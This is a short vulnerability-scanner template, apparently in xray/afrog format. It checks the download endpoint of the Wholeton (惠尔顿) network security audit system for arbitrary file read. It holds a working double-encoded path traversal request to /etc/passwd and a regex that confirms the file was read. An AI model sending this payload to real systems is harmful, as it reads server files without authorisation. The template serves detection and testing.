id: wholeton-audit-fileread

info:
  name: 惠尔顿网络安全审计系统 download 任意文件读取
  author: qwtd
  severity: high
  verified: true
  description: |
    惠尔顿网络安全审计系统download接口存在任意文件读取漏洞，攻击者利用该漏洞可以浏览目录及读取服务端文件内容。

rules:
  r0:
    request:
      method: GET
      path: /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252F.%252Fpasswd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()